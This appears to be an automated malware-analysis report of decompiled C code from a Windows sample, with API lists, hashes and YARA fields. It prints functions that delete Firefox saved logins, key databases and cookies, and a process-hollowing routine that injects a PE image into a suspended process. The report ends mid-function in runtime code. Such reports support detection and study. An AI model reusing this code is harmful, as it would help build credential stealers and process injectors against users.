                    				E004020D5(__ebx,  &_v28);
                    				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FD1( &_v28, _t46, _t135, E004075C2(_t89,  &_v52, E0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                    				E00401FC7();
                    				E00401FC7();
                    				_t128 =  &_v28;
                    				_t136 = FindFirstFileA(E00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
                    				E00401FC7();
                    				_t143 = _t136 - 0xffffffff;
                    				if(_t136 != 0xffffffff) {
                    					while(1) {
                    						L15:
                    						__eflags = FindNextFileA(_t136,  &_v468);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                    						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						}
                    						_t108 =  &(_v468.cFileName);
                    						__eflags =  *_t108 - 0x2e;
                    						if( *_t108 != 0x2e) {
                    							L5:
                    							_t129 =  &(_v468.cFileName);
                    							_t109 = 0;
                    							__eflags = 0;
                    							while(1) {
                    								_t58 =  *(_t129 + _t109) & 0x000000ff;
                    								_t130 = "..";
                    								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                    								_t128 =  &(_v468.cFileName);
                    								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                    									break;
                    								}
                    								_t109 = _t109 + 1;
                    								__eflags = _t109 - 3;
                    								if(_t109 != 3) {
                    									continue;
                    								}
                    								_t59 = 0;
                    								L10:
                    								__eflags = _t59;
                    								if(__eflags != 0) {
                    									E00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                    									E00401FC7();
                    									E00401FC7();
                    									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                    									E00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                    									E00401FC7();
                    									E00401FC7();
                    									_t73 = DeleteFileA(E00401F95( &_v100));
                    									__eflags = _t73;
                    									if(_t73 == 0) {
                    										GetLastError();
                    									}
                    									_t75 = DeleteFileA(E00401F95( &_v76));
                    									__eflags = _t75;
                    									if(_t75 == 0) {
                    										GetLastError();
                    									}
                    								}
                    								goto L15;
                    							}
                    							asm("sbb eax, eax");
                    							_t59 = _t58 | 0x00000001;
                    							__eflags = _t59;
                    							goto L10;
                    						}
                    						__eflags =  *(_t108 + 1) & 0x000000ff;
                    						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                    							continue;
                    						}
                    						goto L5;
                    					}
                    					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                    					E0040A6EF(_t89, _t128, __eflags);
                    					FindClose(_t136);
                    					goto L17;
                    				} else {
                    					FindClose(_t136);
                    					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                    					E0040A6EF(_t89,  &_v28, _t143);
                    					L17:
                    					E00401FC7();
                    					E00401FC7();
                    					E00401FC7();
                    					return 1;
                    				}
                    			}
                    0x0040a012
                    0x0040a012
                    0x0040a012
                    0x0040a01f
                    0x0040a027
                    0x0040a02f
                    0x0040a03c
                    0x0040a05c
                    0x0040a064
                    0x0040a06c
                    0x0040a07d
                    0x0040a09a
                    0x0040a09c
                    0x0040a0a1
                    0x0040a0a4
                    0x0040a1da
                    0x0040a1da
                    0x0040a1e8
                    0x0040a1ea
                    0x00000000
                    0x00000000
                    0x0040a0cd
                    0x0040a0d4
                    0x00000000
                    0x00000000
                    0x0040a0da
                    0x0040a0e0
                    0x0040a0e3
                    0x0040a0f1
                    0x0040a0f1
                    0x0040a0f7
                    0x0040a0f7
                    0x0040a0f9
                    0x0040a0f9
                    0x0040a0fd
                    0x0040a102
                    0x0040a105
                    0x0040a10b
                    0x00000000
                    0x00000000
                    0x0040a10d
                    0x0040a10e
                    0x0040a111
                    0x00000000
                    0x00000000
                    0x0040a113
                    0x0040a11c
                    0x0040a11c
                    0x0040a11e
                    0x0040a14e
                    0x0040a156
                    0x0040a161
                    0x0040a17e
                    0x0040a190
                    0x0040a19b
                    0x0040a1a3
                    0x0040a1b1
                    0x0040a1b7
                    0x0040a1b9
                    0x0040a1bb
                    0x0040a1bb
                    0x0040a1ca
                    0x0040a1d0
                    0x0040a1d2
                    0x0040a1d4
                    0x0040a1d4
                    0x0040a1d2
                    0x00000000
                    0x0040a11e
                    0x0040a117
                    0x0040a119
                    0x0040a119
                    0x00000000
                    0x0040a119
                    0x0040a0e9
                    0x0040a0eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040a0eb
                    0x0040a1fa
                    0x0040a1ff
                    0x0040a208
                    0x00000000
                    0x0040a0aa
                    0x0040a0ab
                    0x0040a0bb
                    0x0040a0c0
                    0x0040a20e
                    0x0040a211
                    0x0040a219
                    0x0040a221
                    0x0040a22c
                    0x0040a22c

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                    • FindClose.KERNEL32(00000000), ref: 0040A0AB
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                    • FindClose.KERNEL32(00000000), ref: 0040A208
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: 5d0491ca9cae89bc5104faea7b268233d26295a2c7dd8e05c1aacd9efcab3538
                    • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                    • Opcode Fuzzy Hash: 5d0491ca9cae89bc5104faea7b268233d26295a2c7dd8e05c1aacd9efcab3538
                    • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040A22D(void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				struct _WIN32_FIND_DATAA _v444;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t35;
                    				signed int _t56;
                    				signed int _t57;
                    				long _t68;
                    				char* _t92;
                    				signed int _t93;
                    				void* _t102;
                    				char* _t105;
                    				void* _t106;
                    				void* _t108;
                    				void* _t109;
                    				void* _t110;
                    				void* _t111;
                    
                    				_t116 = __eflags;
                    				_t108 = __edi;
                    				E004020D5(0,  &_v52);
                    				E004020D5(0,  &_v28);
                    				_t35 = E00402084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FD1( &_v28, _t36, _t109, E004075C2(0,  &_v76, E0043988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                    				E00401FC7();
                    				E00401FC7();
                    				_t104 =  &_v28;
                    				_t110 = FindFirstFileA(E00401F95(E00407558( &_v100,  &_v28, _t116, "*")),  &_v444);
                    				E00401FC7();
                    				_t117 = _t110 - 0xffffffff;
                    				if(_t110 != 0xffffffff) {
                    					__eflags = FindNextFileA(_t110,  &_v444);
                    					if(__eflags == 0) {
                    						L17:
                    						E00402084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                    						E0040A6EF(0, _t104, __eflags);
                    						FindClose(_t110);
                    						goto L18;
                    					} else {
                    						__eflags = 0;
                    						do {
                    							__eflags = _v444.dwFileAttributes & 0x00000010;
                    							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                    								goto L16;
                    							} else {
                    								_t92 =  &(_v444.cFileName);
                    								__eflags =  *_t92 - 0x2e;
                    								if( *_t92 != 0x2e) {
                    									L8:
                    									_t105 =  &(_v444.cFileName);
                    									_t93 = 0;
                    									while(1) {
                    										_t56 =  *(_t105 + _t93) & 0x000000ff;
                    										_t106 = "..";
                    										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                    										_t104 =  &(_v444.cFileName);
                    										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                    											break;
                    										}
                    										_t93 = _t93 + 1;
                    										__eflags = _t93 - 3;
                    										if(_t93 != 3) {
                    											continue;
                    										} else {
                    											_t57 = 0;
                    										}
                    										L13:
                    										__eflags = _t57;
                    										if(__eflags == 0) {
                    											goto L16;
                    										} else {
                    											_t104 = E00407558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                    											E00401FD1( &_v52, _t59, _t110, E00405343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                    											E00401FC7();
                    											E00401FC7();
                    											__eflags = DeleteFileA(E00401F95( &_v52));
                    											if(__eflags != 0) {
                    												_t102 = _t111 - 0x18;
                    												_push("\n[Firefox cookies found, cleared!]");
                    												goto L2;
                    											} else {
                    												_t68 = GetLastError();
                    												__eflags = _t68 != 0;
                    												if(_t68 != 0) {
                    													FindClose(_t110);
                    												} else {
                    													goto L16;
                    												}
                    											}
                    										}
                    										goto L19;
                    									}
                    									asm("sbb eax, eax");
                    									_t57 = _t56 | 0x00000001;
                    									__eflags = _t57;
                    									goto L13;
                    								} else {
                    									__eflags =  *(_t92 + 1) & 0x000000ff;
                    									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                    										goto L16;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							goto L19;
                    							L16:
                    							__eflags = FindNextFileA(_t110,  &_v444);
                    						} while (__eflags != 0);
                    						goto L17;
                    					}
                    				} else {
                    					FindClose(_t110);
                    					_t102 = _t111 - 0x18;
                    					_push("\n[Firefox Cookies not found]");
                    					L2:
                    					E00402084(0, _t102);
                    					E0040A6EF(0, _t104, _t117);
                    					L18:
                    				}
                    				L19:
                    				E00401FC7();
                    				E00401FC7();
                    				return 1;
                    			}
                    0x0040a22d
                    0x0040a22d
                    0x0040a23b
                    0x0040a243
                    0x0040a250
                    0x0040a270
                    0x0040a278
                    0x0040a280
                    0x0040a291
                    0x0040a2ae
                    0x0040a2b0
                    0x0040a2b5
                    0x0040a2b8
                    0x0040a2eb
                    0x0040a2ed
                    0x0040a3b9
                    0x0040a3c3
                    0x0040a3c8
                    0x0040a3d1
                    0x00000000
                    0x0040a2f3
                    0x0040a2f3
                    0x0040a2f5
                    0x0040a2f5
                    0x0040a2fc
                    0x00000000
                    0x0040a302
                    0x0040a302
                    0x0040a308
                    0x0040a30b
                    0x0040a319
                    0x0040a319
                    0x0040a31f
                    0x0040a321
                    0x0040a321
                    0x0040a325
                    0x0040a32a
                    0x0040a32d
                    0x0040a333
                    0x00000000
                    0x00000000
                    0x0040a335
                    0x0040a336
                    0x0040a339
                    0x00000000
                    0x0040a33b
                    0x0040a33b
                    0x0040a33b
                    0x0040a344
                    0x0040a344
                    0x0040a346
                    0x00000000
                    0x0040a348
                    0x0040a360
                    0x0040a36f
                    0x0040a377
                    0x0040a37f
                    0x0040a393
                    0x0040a395
                    0x0040a3fd
                    0x0040a3ff
                    0x00000000
                    0x0040a397
                    0x0040a397
                    0x0040a39e
                    0x0040a3a1
                    0x0040a3f2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040a3a1
                    0x0040a395
                    0x00000000
                    0x0040a346
                    0x0040a33f
                    0x0040a341
                    0x0040a341
                    0x00000000
                    0x0040a30d
                    0x0040a311
                    0x0040a313
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040a313
                    0x0040a30b
                    0x00000000
                    0x0040a3a3
                    0x0040a3b1
                    0x0040a3b1
                    0x00000000
                    0x0040a2f5
                    0x0040a2ba
                    0x0040a2bb
                    0x0040a2c4
                    0x0040a2c6
                    0x0040a2cb
                    0x0040a2cb
                    0x0040a2d0
                    0x0040a3d7
                    0x0040a3d7
                    0x0040a3d9
                    0x0040a3dc
                    0x0040a3e4
                    0x0040a3f0

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
                    • FindClose.KERNEL32(00000000), ref: 0040A2BB
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                    • GetLastError.KERNEL32 ref: 0040A397
                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                    • FindClose.KERNEL32(00000000), ref: 0040A3D1
                    • FindClose.KERNEL32(00000000), ref: 0040A3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 532992503-432212279
                    • Opcode ID: 19b94a7eb9c72e0da80e9ae67ef59f4eca6279e3ef411f6a90b8712bb590b6c0
                    • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                    • Opcode Fuzzy Hash: 19b94a7eb9c72e0da80e9ae67ef59f4eca6279e3ef411f6a90b8712bb590b6c0
                    • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E105A4F99(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                    				void _v8;
                    				signed int _v12;
                    				void* _v16;
                    				CONTEXT* _v20;
                    				WCHAR* _v24;
                    				struct _STARTUPINFOW _v92;
                    				void* __edi;
                    				void* _t58;
                    				void* _t72;
                    				void* _t73;
                    				int _t83;
                    				intOrPtr* _t95;
                    				void* _t98;
                    				signed int _t102;
                    				void* _t104;
                    				void* _t106;
                    				intOrPtr* _t109;
                    				CONTEXT* _t110;
                    				intOrPtr* _t111;
                    				void* _t113;
                    				CONTEXT* _t114;
                    				struct _PROCESS_INFORMATION* _t116;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_v16 = __edx;
                    				_v24 = __ecx;
                    				if( *__edx == 0x5a4d) {
                    					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                    					if( *_t95 == 0x4550) {
                    						_push(_t106);
                    						E105C2D6E(_t106,  &_v92, 0, 0x44);
                    						_t116 = _a4;
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                    							L21:
                    							_t58 = 0;
                    							L22:
                    							L23:
                    							return _t58;
                    						}
                    						_t109 =  *0x4532ac;
                    						 *_t109(_v92.hStdInput);
                    						 *_t109(_v92.hStdOutput);
                    						 *_t109(_v92.hStdError);
                    						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                    						_v20 = _t110;
                    						_t110->ContextFlags = 0x10007;
                    						_t14 =  &(_t116->hThread); // 0xffffdcf2
                    						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                    							L20:
                    							TerminateProcess(_t116->hProcess, 0);
                    							_t111 =  *0x4532ac;
                    							 *_t111(_t116->hProcess);
                    							_t50 =  &(_t116->hThread); // 0xffffdcf2
                    							 *_t111( *_t50);
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							goto L21;
                    						} else {
                    							_t72 = _v8;
                    							if(_t72 ==  *(_t95 + 0x34)) {
                    								NtUnmapViewOfSection(_t116->hProcess, _t72);
                    							}
                    							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                    							_v24 = _t73;
                    							if(_t73 == 0) {
                    								goto L20;
                    							} else {
                    								_t113 = _v16;
                    								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                    									goto L20;
                    								}
                    								_v12 = _v12 & 0x00000000;
                    								if(0 >=  *(_t95 + 6)) {
                    									L14:
                    									_t98 = _t95 + 0x34;
                    									_t114 = _v20;
                    									if(_v8 ==  *_t98) {
                    										L17:
                    										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                    										_t48 =  &(_t116->hThread); // 0xffffdcf2
                    										if(SetThreadContext( *_t48, _t114) == 0) {
                    											goto L20;
                    										}
                    										_t49 =  &(_t116->hThread); // 0xffffdcf2
                    										if(ResumeThread( *_t49) == 0xffffffff) {
                    											goto L20;
                    										}
                    										_t58 = 1;
                    										goto L22;
                    									}
                    									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                    									if(_t83 != 0) {
                    										goto L17;
                    									}
                    									TerminateProcess(_t116->hProcess, _t83);
                    									goto L21;
                    								}
                    								_t104 = 0;
                    								_v16 = 0;
                    								do {
                    									_t28 = _t113 + 0x3c; // 0x83ffc983
                    									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
                    									_t102 = _v12 + 1;
                    									_t104 = _v16 + 0x28;
                    									_v12 = _t102;
                    									_v16 = _t104;
                    								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                    								goto L14;
                    							}
                    						}
                    					}
                    					_t58 = 0;
                    					goto L23;
                    				}
                    				return 0;
                    			}
                    0x105a4f9f
                    0x105a4fa8
                    0x105a4fab
                    0x105a4fb1
                    0x105a4fbe
                    0x105a4fc6
                    0x105a4fd0
                    0x105a4fd9
                    0x105a4fde
                    0x105a4fe8
                    0x105a4fea
                    0x105a4feb
                    0x105a4fec
                    0x105a5006
                    0x105a5190
                    0x105a5190
                    0x105a5192
                    0x105a5194
                    0x00000000
                    0x105a5194
                    0x105a500f
                    0x105a5015
                    0x105a501a
                    0x105a501f
                    0x105a5032
                    0x105a5035
                    0x105a5038
                    0x105a503e
                    0x105a5049
                    0x105a516f
                    0x105a5173
                    0x105a517b
                    0x105a5181
                    0x105a5183
                    0x105a5186
                    0x105a518c
                    0x105a518d
                    0x105a518e
                    0x105a518f
                    0x00000000
                    0x105a5071
                    0x105a5071
                    0x105a5077
                    0x105a507c
                    0x105a507c
                    0x105a5091
                    0x105a5097
                    0x105a509c
                    0x00000000
                    0x105a50a2
                    0x105a50a2
                    0x105a50b6
                    0x00000000
                    0x00000000
                    0x105a50bc
                    0x105a50c6
                    0x105a5110
                    0x105a5113
                    0x105a5116
                    0x105a511b
                    0x105a5143
                    0x105a514a
                    0x105a5150
                    0x105a515b
                    0x00000000
                    0x00000000
                    0x105a515d
                    0x105a5169
                    0x00000000
                    0x00000000
                    0x105a516b
                    0x00000000
                    0x105a516b
                    0x105a512e
                    0x105a5136
                    0x00000000
                    0x00000000
                    0x105a513b
                    0x00000000
                    0x105a513b
                    0x105a50c8
                    0x105a50ca
                    0x105a50cd
                    0x105a50cd
                    0x105a50f2
                    0x105a50fe
                    0x105a5103
                    0x105a5106
                    0x105a5109
                    0x105a510c
                    0x00000000
                    0x105a50cd
                    0x105a509c
                    0x105a5049
                    0x105a4fc8
                    0x00000000
                    0x105a4fc8
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2469e3083292f701c311b878a3b14c99dabb4edf3a4aaae222874b4e6f5cfb23
                    • Instruction ID: d7d339fe152a989d42620b9c5b2f5e2415568cd0140fff9f840bd936dff26f2e
                    • Opcode Fuzzy Hash: 2469e3083292f701c311b878a3b14c99dabb4edf3a4aaae222874b4e6f5cfb23
                    • Instruction Fuzzy Hash: 0F515570A00605FFEB108FA5CC45FAEBBB9EF44746F204468F684EA2A5D771E910CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00442C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				char _v52;
                    				int _v56;
                    				int _v60;
                    				signed int _v100;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v356;
                    				char _v360;
                    				void* __ebp;
                    				signed int _t65;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t78;
                    				signed int _t85;
                    				signed int _t89;
                    				signed int _t91;
                    				long _t93;
                    				signed int* _t96;
                    				signed int _t99;
                    				signed int _t102;
                    				signed int _t106;
                    				void* _t113;
                    				signed int _t116;
                    				void* _t117;
                    				void* _t119;
                    				void* _t120;
                    				void* _t122;
                    				signed int _t124;
                    				intOrPtr _t125;
                    				signed int* _t128;
                    				signed int _t129;
                    				void* _t132;
                    				void* _t134;
                    				signed int _t135;
                    				signed int _t137;
                    				void* _t140;
                    				intOrPtr _t141;
                    				void* _t143;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t158;
                    				signed int _t161;
                    				intOrPtr* _t166;
                    				signed int _t167;
                    				intOrPtr* _t168;
                    				void* _t169;
                    				intOrPtr _t170;
                    				void* _t171;
                    				signed int _t172;
                    				int _t176;
                    				signed int _t178;
                    				char** _t179;
                    				signed int _t183;
                    				signed int _t184;
                    				void* _t191;
                    				signed int _t192;
                    				void* _t193;
                    				signed int _t194;
                    
                    				_t178 = __esi;
                    				_t171 = __edi;
                    				_t65 = E004428CD();
                    				_v8 = _v8 & 0x00000000;
                    				_t137 = _t65;
                    				_v16 = _v16 & 0x00000000;
                    				_v12 = _t137;
                    				if(E0044292B( &_v8) != 0 || E004428D3( &_v16) != 0) {
                    					L46:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043698A();
                    					asm("int3");
                    					_t191 = _t193;
                    					_t194 = _t193 - 0x10;
                    					_push(_t137);
                    					_t179 = E004428CD();
                    					_v52 = 0;
                    					_v56 = 0;
                    					_v60 = 0;
                    					_t72 = E0044292B( &_v52);
                    					_t143 = _t178;
                    					__eflags = _t72;
                    					if(_t72 != 0) {
                    						L66:
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						E0043698A();
                    						asm("int3");
                    						_push(_t191);
                    						_t192 = _t194;
                    						_t74 =  *0x46a00c; // 0xee31ea10
                    						_v100 = _t74 ^ _t192;
                    						 *0x46a344 =  *0x46a344 | 0xffffffff;
                    						 *0x46a338 =  *0x46a338 | 0xffffffff;
                    						_push(0);
                    						_push(_t179);
                    						_push(_t171);
                    						_t139 = "TZ";
                    						_t172 = 0;
                    						 *0x46b748 = 0;
                    						_t78 = E00439895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                    						__eflags = _t78;
                    						if(_t78 != 0) {
                    							__eflags = _t78 - 0x22;
                    							if(_t78 == 0x22) {
                    								_t184 = E0043F98C(_t143, _v276);
                    								__eflags = _t184;
                    								if(__eflags != 0) {
                    									_t85 = E00439895(__eflags,  &_v280, _t184, _v276, _t139);
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E004401F5(0);
                    										_t172 = _t184;
                    									} else {
                    										_push(_t184);
                    										goto L72;
                    									}
                    								} else {
                    									_push(0);
                    									L72:
                    									E004401F5();
                    								}
                    							}
                    						} else {
                    							_t172 =  &_v272;
                    						}
                    						asm("sbb esi, esi");
                    						_t183 =  ~(_t172 -  &_v272) & _t172;
                    						__eflags = _t172;
                    						if(_t172 == 0) {
                    							L80:
                    							L47();
                    						} else {
                    							__eflags =  *_t172;
                    							if(__eflags == 0) {
                    								goto L80;
                    							} else {
                    								_push(_t172);
                    								E00442C8E(_t139, _t172, _t183, __eflags);
                    							}
                    						}
                    						E004401F5(_t183);
                    						__eflags = _v16 ^ _t192;
                    						return E0042FD1B(_v16 ^ _t192);
                    					} else {
                    						_t89 = E004428D3( &_v16);
                    						_pop(_t143);
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L66;
                    						} else {
                    							_t91 = E004428FF( &_v20);
                    							_pop(_t143);
                    							__eflags = _t91;
                    							if(_t91 != 0) {
                    								goto L66;
                    							} else {
                    								E004401F5( *0x46b740);
                    								 *0x46b740 = 0;
                    								 *_t194 = 0x46b750;
                    								_t93 = GetTimeZoneInformation(??);
                    								__eflags = _t93 - 0xffffffff;
                    								if(_t93 != 0xffffffff) {
                    									_t150 =  *0x46b750 * 0x3c;
                    									_t167 =  *0x46b7a4; // 0x0
                    									_push(_t171);
                    									 *0x46b748 = 1;
                    									_v12 = _t150;
                    									__eflags =  *0x46b796; // 0x0
                    									if(__eflags != 0) {
                    										_t151 = _t150 + _t167 * 0x3c;
                    										__eflags = _t151;
                    										_v12 = _t151;
                    									}
                    									__eflags =  *0x46b7ea; // 0x0
                    									if(__eflags == 0) {
                    										L56:
                    										_v16 = 0;
                    										_v20 = 0;
                    									} else {
                    										_t106 =  *0x46b7f8; // 0x0
                    										__eflags = _t106;
                    										if(_t106 == 0) {
                    											goto L56;
                    										} else {
                    											_v16 = 1;
                    											_v20 = (_t106 - _t167) * 0x3c;
                    										}
                    									}
                    									_t176 = E0043F55B(0, _t167);
                    									_t99 = WideCharToMultiByte(_t176, 0, 0x46b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										L60:
                    										 *( *_t179) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L60;
                    										} else {
                    											( *_t179)[0x3f] = 0;
                    										}
                    									}
                    									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                    									__eflags = _t102;
                    									if(_t102 == 0) {
                    										L64:
                    										 *(_t179[1]) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L64;
                    										} else {
                    											_t179[1][0x3f] = 0;
                    										}
                    									}
                    								}
                    								 *(E004428C7()) = _v12;
                    								 *((intOrPtr*)(E004428BB())) = _v16;
                    								_t96 = E004428C1();
                    								 *_t96 = _v20;
                    								return _t96;
                    							}
                    						}
                    					}
                    				} else {
                    					_t168 =  *0x46b740; // 0x0
                    					_t8 =  &_a4; // 0x44307e
                    					_t178 =  *_t8;
                    					if(_t168 == 0) {
                    						L12:
                    						E004401F5(_t168);
                    						_t154 = _t178;
                    						_t169 = _t154 + 1;
                    						do {
                    							_t113 =  *_t154;
                    							_t154 = _t154 + 1;
                    						} while (_t113 != 0);
                    						 *0x46b740 = E0043F98C(_t154 - _t169, _t154 - _t169 + 1);
                    						_t116 = E004401F5(0);
                    						_t170 =  *0x46b740; // 0x0
                    						if(_t170 == 0) {
                    							goto L45;
                    						} else {
                    							_t158 = _t178;
                    							_push(_t171);
                    							_t171 = _t158 + 1;
                    							do {
                    								_t117 =  *_t158;
                    								_t158 = _t158 + 1;
                    							} while (_t117 != 0);
                    							_t159 = _t158 - _t171;
                    							_t119 = E00441916(_t170, _t158 - _t171 + 1, _t178);
                    							_t193 = _t193 + 0xc;
                    							if(_t119 == 0) {
                    								_t171 = 3;
                    								_push(_t171);
                    								_t120 = E0044D309(_t159,  *_t137, 0x40, _t178);
                    								_t193 = _t193 + 0x10;
                    								if(_t120 == 0) {
                    									while( *_t178 != 0) {
                    										_t178 = _t178 + 1;
                    										_t171 = _t171 - 1;
                    										if(_t171 != 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_pop(_t171);
                    									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                    									if(_t137 != 0) {
                    										_t178 = _t178 + 1;
                    									}
                    									_t161 = E00436769(_t159, _t178) * 0xe10;
                    									_v8 = _t161;
                    									while(1) {
                    										_t122 =  *_t178;
                    										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                    											break;
                    										}
                    										_t178 = _t178 + 1;
                    									}
                    									__eflags =  *_t178 - 0x3a;
                    									if( *_t178 == 0x3a) {
                    										_t178 = _t178 + 1;
                    										_t161 = _v8 + E00436769(_t161, _t178) * 0x3c;
                    										_v8 = _t161;
                    										while(1) {
                    											_t132 =  *_t178;
                    											__eflags = _t132 - 0x30;
                    											if(_t132 < 0x30) {
                    												break;
                    											}
                    											__eflags = _t132 - 0x39;
                    											if(_t132 <= 0x39) {
                    												_t178 = _t178 + 1;
                    												__eflags = _t178;
                    												continue;
                    											}
                    											break;
                    										}
                    										__eflags =  *_t178 - 0x3a;
                    										if( *_t178 == 0x3a) {
                    											_t178 = _t178 + 1;
                    											_t161 = _v8 + E00436769(_t161, _t178);
                    											_v8 = _t161;
                    											while(1) {
                    												_t134 =  *_t178;
                    												__eflags = _t134 - 0x30;
                    												if(_t134 < 0x30) {
                    													goto L38;
                    												}
                    												__eflags = _t134 - 0x39;
                    												if(_t134 <= 0x39) {
                    													_t178 = _t178 + 1;
                    													__eflags = _t178;
                    													continue;
                    												}
                    												goto L38;
